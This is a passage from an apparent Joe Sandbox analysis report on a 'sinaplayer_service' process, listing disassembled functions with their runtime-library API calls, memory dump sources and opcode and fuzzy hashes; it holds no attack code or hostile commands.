                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$D@std@@@2@$?tie@?$basic_ios@V?$basic_ostream@$?good@ios_base@std@@?rdbuf@?$basic_ios@V?$basic_streambuf@$?flush@?$basic_ostream@V12@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2615938766-0
                                                                                                                                                                                                    • Opcode ID: d464c8f735ff0aa39ffafdc54ec096b0bf7216c1afb6773155114c4782f1c227
                                                                                                                                                                                                    • Instruction ID: bfd9891b934b889b873ca4fe56db87d25745fad625627ddd7c4b57ee548ef9a8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d464c8f735ff0aa39ffafdc54ec096b0bf7216c1afb6773155114c4782f1c227
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF2116383041008FC716CF18D958B2AFBE9FF98710B19855AE486C7361CB39E900CF84
                                                                                                                                                                                                    Function 6C5BEC43 Relevance: 12.1, APIs: 8, Instructions: 64COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::GetHistory.LIBCMT ref: 6C5BEC4E
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::GetHistory.LIBCMT ref: 6C5BEC59
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::MeasuredHistory::Mean.LIBCMT ref: 6C5BEC62
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::MeasuredHistory::Mean.LIBCMT ref: 6C5BEC6C
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::MeasuredHistory::Variance.LIBCMT ref: 6C5BECC1
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::MeasuredHistory::Variance.LIBCMT ref: 6C5BECCC
                                                                                                                                                                                                    • _CIsqrt.MSVCR120(?,?,?,?), ref: 6C5BECD7
                                                                                                                                                                                                    • _CIexp.MSVCR120(?,?,?,?), ref: 6C5BECE3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Climbing::Concurrency::details::Hill$History::Measured$HistoryMeanVariance$IexpIsqrt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3578402837-0
                                                                                                                                                                                                    • Opcode ID: ae82aef248d242aae05dd7e92cc0100d3c046a7ba34aaaea468f0cd96ac6b787
                                                                                                                                                                                                    • Instruction ID: ed0a6b816cca5fd953b20b0ac645855c08f41eecf4702146dff69ca5c19c897f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae82aef248d242aae05dd7e92cc0100d3c046a7ba34aaaea468f0cd96ac6b787
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A119731E00909E6CF116FA1E9150EDBF34FF84341F2688D0E89032694EF724AB88BC6
                                                                                                                                                                                                    Function 6C5F88C1 Relevance: 10.7, APIs: 7, Instructions: 214COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,000000FF,?,00000002,?,?,?,?,6C5F88BC,?,?,?,?,?,?,?), ref: 6C5F894A
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,000000FF,?,?,?,?,?,?,6C5F88BC,?,?,?,?,?,?,?), ref: 6C5F89B7
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,000000FF,?,00000000,?,?,?,?,6C5F88BC,?,?,?,?,?,?,?), ref: 6C5F89F1
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,000000FF,00000000,?,?,?,?,?,6C5F88BC,?,?,?,?,?,?,?), ref: 6C5F8A11
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,000000FF,?,?,?,?,?,?,6C5F88BC,?,?,?,?,?,?,?), ref: 6C5F8A30
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,6C5F88BC,?,?,?,?,?,?,?,?,?), ref: 6C5F8A8F
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,6C5F88BC,?,?,?,?,?,?,?,?,?), ref: 6C5F8A9D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wcsncpy_s$_errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4201559322-0
                                                                                                                                                                                                    • Opcode ID: c9ef516c6702ad622d6d6640c02258283ebc54bc3a3d96c164f5196a919972a6
                                                                                                                                                                                                    • Instruction ID: ac78fb190f949a89908c8c2b24c08a596fe9cd927c5fdc0b027cbd5ac9093d86
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9ef516c6702ad622d6d6640c02258283ebc54bc3a3d96c164f5196a919972a6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26619531A053069BDF1C8E2B8D506AB32A5EF47368B25462FE87496A94D730D843CF97
                                                                                                                                                                                                    Function 0038D980 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 188COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                                                                                    • Opcode ID: 1f0b50bbe208faf474d32492d30d00e59ded936b9ff763fd3b81ac719cb67b5c
                                                                                                                                                                                                    • Instruction ID: a1f06ef7289988ab73f1b720210eda780e164646ffd4f768bc4c2f91e8c836cf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f0b50bbe208faf474d32492d30d00e59ded936b9ff763fd3b81ac719cb67b5c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E61BE7590034ADFDF26DF58C880ABEB7F9EF18311F5505AAE442A7680D734A944DB60
                                                                                                                                                                                                    Function 003713E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,0037155F,?,?,?,?,?,?,003710EA,?,?), ref: 003713FA
                                                                                                                                                                                                      • Part of subcall function 003716C0: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,00000000,?,?,00371452,00000000,?,?,?,?,?,0037155F,?,?,?), ref: 003716D6
                                                                                                                                                                                                    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,0037155F,?,?,?,?,?,?,003710EA,?,?), ref: 0037141A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xout_of_range@std@@
                                                                                                                                                                                                    • String ID: invalid string position$string too long
                                                                                                                                                                                                    • API String ID: 1960685668-4289949731
                                                                                                                                                                                                    • Opcode ID: c5ded28a8643f3e47907690d37089b9f64304f9d6a78239e2a8f6bd6791db5be
                                                                                                                                                                                                    • Instruction ID: 4c5d96c0f57a8dc87f08a4a6ffac47709c5ad5dae84da009047b0c5eeab39e98
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5ded28a8643f3e47907690d37089b9f64304f9d6a78239e2a8f6bd6791db5be
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE31C1333043108BDB329F5DE840B5AF7BAEB91761F108A2FE5598B281C7B69840C7E5
                                                                                                                                                                                                    Function 00374FE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,00375150,?,?,?,?,?,?,00371E69,?,?), ref: 00374FFA
                                                                                                                                                                                                    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,00375150,?,?,?,?,?,?,00371E69,?,?), ref: 0037501A
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,?,?,?,?,00375150,?,?,?,?,?,?,00371E69,?,?), ref: 00375054
                                                                                                                                                                                                    • memcpy.MSVCR120(?,00000007,00000007,?,?,?,?,00375150,?,?,?,?,?,?,00371E69,?), ref: 003750BE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xout_of_range@std@@$Xlength_error@std@@memcpy
                                                                                                                                                                                                    • String ID: invalid string position$string too long
                                                                                                                                                                                                    • API String ID: 3790025958-4289949731
                                                                                                                                                                                                    • Opcode ID: 06a5f43dc51949d550727b505c6118289c1ec23aaafb7f37298dc9fe6c8b1fa4
                                                                                                                                                                                                    • Instruction ID: 2c4d12a02a2995840cf2933d9d65068052d311bc911c56f90df8d62fce15080b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06a5f43dc51949d550727b505c6118289c1ec23aaafb7f37298dc9fe6c8b1fa4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D31B4323147049B8B3A9F58E88585AF3BAFFD4751311492FE44AC7250DBB2A854CBE5
                                                                                                                                                                                                    Function 00392430 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,00000000,00000001,?,00390A45,00000000,00000000,00000001,00000000,?,?,?,0039116E,?,Content-Disposition: form-data; name=",00000000), ref: 00392493
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,00000000,00000000,00000001,?,00390A45,00000000,00000000,00000001,00000000,?,?,?,0039116E,?,Content-Disposition: form-data; name="), ref: 003924AB
                                                                                                                                                                                                    • memmove.MSVCR120(00000018,00000018,?,00000000,00000000,00000001,?,00390A45,00000000,00000000,00000001,00000000,?,?,?,0039116E), ref: 003924FD
                                                                                                                                                                                                    • memcpy.MSVCR120(00000018,00000000,00000018,00000000,00000000,00000001,?,00390A45,00000000,00000000,00000001,00000000,?,?,?,0039116E), ref: 0039251E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xlength_error@std@@Xout_of_range@std@@memcpymemmove
                                                                                                                                                                                                    • String ID: invalid string position$string too long
                                                                                                                                                                                                    • API String ID: 1110030134-4289949731
                                                                                                                                                                                                    • Opcode ID: f770f1cd805ade5d30ff40420fd8446d4af056629775791023a5402950e32399
                                                                                                                                                                                                    • Instruction ID: f02ae44fd42034ae319eab2feb508995b43c97c52a62366dac1d54a334ed10e7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f770f1cd805ade5d30ff40420fd8446d4af056629775791023a5402950e32399
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E31BC31310A05ABDF2ADF1EDC9596BB7AAEB81750710482DF85ACB681CB30EC41CB90
                                                                                                                                                                                                    Function 003865E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111timewindowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Now@TimeTicks@base@@SA?AV12@XZ.BASE(?,8285FFAB,00000000,?,?), ref: 00386624
                                                                                                                                                                                                    • ?Lock@LockImpl@internal@base@@QAEXXZ.BASE ref: 00386660
                                                                                                                                                                                                    • ?Unlock@LockImpl@internal@base@@QAEXXZ.BASE ref: 00386734
                                                                                                                                                                                                      • Part of subcall function 00386770: ?GetRef@WeakReferenceOwner@internal@base@@QBE?AVWeakReference@23@XZ.BASE(8285FFAB,8285FFAB), ref: 003867A4
                                                                                                                                                                                                      • Part of subcall function 00386770: ??0WeakPtrBase@internal@base@@IAE@ABVWeakReference@12@@Z.BASE(00000000), ref: 003867B7
                                                                                                                                                                                                      • Part of subcall function 00386770: ??1WeakReference@internal@base@@QAE@XZ.BASE ref: 003867CE
                                                                                                                                                                                                    • ?is_valid@WeakReference@internal@base@@QBE_NXZ.BASE(0038239E), ref: 003866B6
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE ref: 003866F5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Weak$Impl@internal@base@@LockReference@internal@base@@$?is_valid@Base@internal@base@@Lock@Message@logging@@Now@Owner@internal@base@@Ref@ReferenceReference@12@@Reference@23@Ticks@base@@TimeUnlock@V12@
                                                                                                                                                                                                    • String ID: Vll
                                                                                                                                                                                                    • API String ID: 4263299635-3458357932
                                                                                                                                                                                                    • Opcode ID: 084029361a7ea3297bb0a1fa3c440d4589b7570f3cd4736e9fd1dd6fa04fda33
                                                                                                                                                                                                    • Instruction ID: dc13544e3aebb6ba2d82b447593e6e7316f2013c05cda5c564f1d4106e0e1c46
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 084029361a7ea3297bb0a1fa3c440d4589b7570f3cd4736e9fd1dd6fa04fda33
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45414A75900609DFCB05DFA8C985BEEBBF4FF48314F14425AE825A7780DB34AA05CB90
                                                                                                                                                                                                    Function 6C5D6F6D Relevance: 10.6, APIs: 7, Instructions: 107timeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5D6F91
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5D6F9B
                                                                                                                                                                                                      • Part of subcall function 6C5F4670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6C5CB412,?,6C5CBD2C,00000003,6C5A3BC7,6C564630,00000008,6C57C625,?), ref: 6C5F4677
                                                                                                                                                                                                    • _get_timezone.MSVCR120(?), ref: 6C5D6FBE
                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 6C5D6FE4
                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,23C34600,00000000), ref: 6C5D7018
                                                                                                                                                                                                    • __aullrem.LIBCMT ref: 6C5D707E
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6C5D70B0
                                                                                                                                                                                                      • Part of subcall function 6C5F469B: IsProcessorFeaturePresent.KERNEL32(00000017,6C5F466F,?,?,?,?,?,?,6C5F467C,00000000,00000000,00000000,00000000,00000000,6C5CB412), ref: 6C5F469D
                                                                                                                                                                                                      • Part of subcall function 6C5F469B: __crtTerminateProcess.MSVCR120(C0000417,00000002,C0000417,00000001,?,00000017,6C5F466F,?,?,?,?,?,?,6C5F467C,00000000,00000000), ref: 6C5F46BC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time$FeatureFileInformationPresentProcessProcessorSystemTerminateZone__aullrem__crt_errno_get_timezone_invalid_parameter_invalid_parameter_noinfo_invoke_watson
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1117467957-0
                                                                                                                                                                                                    • Opcode ID: d02ed87318a5d92bd01f7f97a2f5c51b25b496871928f97d32cfd764c5982f02
                                                                                                                                                                                                    • Instruction ID: e847d55784682dc8d52c2a3a4dda45d86159091a87f729388d75449b37d7f40c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d02ed87318a5d92bd01f7f97a2f5c51b25b496871928f97d32cfd764c5982f02
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1631C371A05314DBDB20DB69DCC1F9AB3B8EF85744F11099AE10AD7A80DB70A984CB69
                                                                                                                                                                                                    Function 6C5BC8B8 Relevance: 10.6, APIs: 7, Instructions: 92threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 6C5BC8BF
                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6C5BC90D
                                                                                                                                                                                                      • Part of subcall function 6C5BF8AE: ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(?,00000000,.iWl,?,6C5A2519,00000000,?,00000000,00000000,?,?,?,?,6C5758C9,00000004,6C57692E), ref: 6C5BF8BD
                                                                                                                                                                                                      • Part of subcall function 6C5BF904: ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(?,?,6C5BC958,00000000,00000000,?,?,?,?,?,?,?,?,?,?,6C57793F), ref: 6C5BF90A
                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCMT ref: 6C5BC95F
                                                                                                                                                                                                      • Part of subcall function 6C5C5CEF: SetEvent.KERNEL32(00000000,?,6C5BC964,?,00000000,00000000), ref: 6C5C5D3D
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,6C57793F,00000000), ref: 6C5BC96E
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C57793F,00000000), ref: 6C5BC99C
                                                                                                                                                                                                    • TlsGetValue.KERNEL32(00000000,?,00000024,6C5A3640,00000000,?), ref: 6C5BC9BA
                                                                                                                                                                                                    • TlsSetValue.KERNEL32(00000000,?,?,00000024,6C5A3640,00000000,?), ref: 6C5BC9C5
                                                                                                                                                                                                      • Part of subcall function 6C5C5773: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCMT ref: 6C5C57C1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Version@$Concurrency::details::Concurrency@@CriticalManager@1@Proxy::ResourceSchedulerSectionValue$BorrowedCoreCurrentEnterEventH_prolog3_IncrementLeaveStateSubscriptionThreadToggle
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1834826012-0
                                                                                                                                                                                                    • Opcode ID: e5e2e453a9abe2283ec16789cebdfe77f03f2d77ec2a9c3f2be0fb3642824743
                                                                                                                                                                                                    • Instruction ID: 3e48290a50826d5e30b54d9b983eb217d141298fcb7110b5de58eca83cfac6e5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e5e2e453a9abe2283ec16789cebdfe77f03f2d77ec2a9c3f2be0fb3642824743
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B731C471A00105DFCF08DFA5C8D49AEBBB5FF48304B045299E806AB352D734E845CFA5
                                                                                                                                                                                                    Function 00375B50 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375B74
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375B84
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375B90
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375BD1
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00375C30
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?pptr@?$basic_streambuf@$??3@?gptr@?$basic_streambuf@
                                                                                                                                                                                                    • String ID: " 7
                                                                                                                                                                                                    • API String ID: 4233710878-3920742961
                                                                                                                                                                                                    • Opcode ID: d177002f84bbbb0b50972382f266b4df84e21a4799b4364d8d78745a81ac6f86
